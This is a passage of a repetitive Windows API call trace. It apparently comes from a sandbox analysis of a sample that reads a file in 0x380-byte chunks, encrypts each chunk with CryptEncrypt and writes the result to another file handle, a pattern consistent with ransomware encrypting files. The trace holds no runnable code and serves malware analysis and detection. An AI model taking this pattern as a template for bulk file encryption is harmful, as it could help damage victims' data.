lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.855] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.855] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.856] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.856] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.857] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.857] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.858] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.859] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.859] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.859] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.859] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.859] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.861] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.861] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.861] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.861] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.861] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.861] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.862] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.862] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.862] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.862] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.862] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.863] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.863] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.863] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.863] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.863] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.863] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.864] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.864] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.864] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.864] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.864] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, 